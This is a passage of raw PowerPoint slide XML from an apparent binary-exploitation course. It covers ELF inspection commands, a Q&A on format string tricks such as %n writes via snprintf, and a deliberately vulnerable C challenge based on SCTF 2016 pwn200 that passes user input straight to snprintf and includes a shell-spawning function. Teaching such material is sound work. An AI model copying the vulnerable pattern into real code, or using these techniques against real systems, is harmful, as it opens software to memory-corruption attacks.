          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –s elf</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF9B794B-0741-40A7-B070-5D0F74F32BF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="6101357"/>
            <a:ext cx="2428870" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ cat /proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/maps</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="51" name="Shape 773">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FF8CB4B-B2C7-4006-847E-0BE62EAF9FF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="46" idx="3"/>
            <a:endCxn id="47" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4401638" y="2360723"/>
            <a:ext cx="2141350"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3" name="矩形 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE82D1DB-DD7B-4784-89C6-1029D9C46ED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4987244" y="1981599"/>
            <a:ext cx="970137" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ ./elf</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="矩形 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FE90358-DA20-4011-AA0F-9377CF97F200}"/>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Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>下的可执行文件格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177568297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2127"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2128" name="Shape 2128"/>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Format String tricks and gotchas</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2129" name="Shape 2129"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-423323">
              <a:buClr>
                <a:srgbClr val="0000FF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: When can I use %n and when shouldn’t?</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867"/>
              <a:t>A: For printf, it’ll be too large to print out in your console(or socket if socat/xinetd used). But for snprintf, you can use %n with not too large values. (0x0804xxxx can be considered not too large) snprintf won’t overflow, but will calculate the actual value and return actual bytes_written.</a:t>
            </a:r>
            <a:endParaRPr sz="1867"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1867"/>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0000FF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: Can I modify more than 1 values on stack within a single format string?</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867"/>
              <a:t>A: Definitely you can.But if you want the second value addr to be based on the first modified value, there are some tricks here: The first %n must not be positional param. That’s because In libc implementation, the positional values are copied into an internal struct in function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>printf_positional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> before applying fmt transformation.</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>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2133"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2134" name="Shape 2134"/>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Format String Challenge</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2135" name="Shape 2135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788133" y="1838933"/>
            <a:ext cx="10729600" cy="4673200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>// simplified version of SCTF 2016 pwn200</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>static s[0x400];</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>static buf[0x400];</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>void run_system() { system("/bin/sh"); }</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>void main() {</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	for (int i = 0; i &lt; 2; i++) {</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    	    fgets(buf, 1024, stdin);</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    	    snprintf(s, 1024, buf);</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    	    puts(s);</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    	    fflush(stdout);</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2136" name="Shape 2136"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6911233" y="3130800"/>
            <a:ext cx="3588800" cy="16932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 sz="2667" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Can you pwn</a:t>
            </a:r>
            <a:endParaRPr sz="2667" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2667" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>using different solutions?</a:t>
            </a:r>
            <a:endParaRPr sz="2667" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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2140"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2141" name="Shape 2141"/>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en"/>
              <a:t>Format String Tools and Ref</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2142" name="Shape 2142"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/hellman/libformatstr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pPr>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FCAA0C6-5FEB-4A44-8708-E31EB131A0B0}"/>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1497257" y="2188918"/>
            <a:ext cx="9467342" cy="2254129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="307679819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35B242C3-8CA9-436E-A166-131014FF0FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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D62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
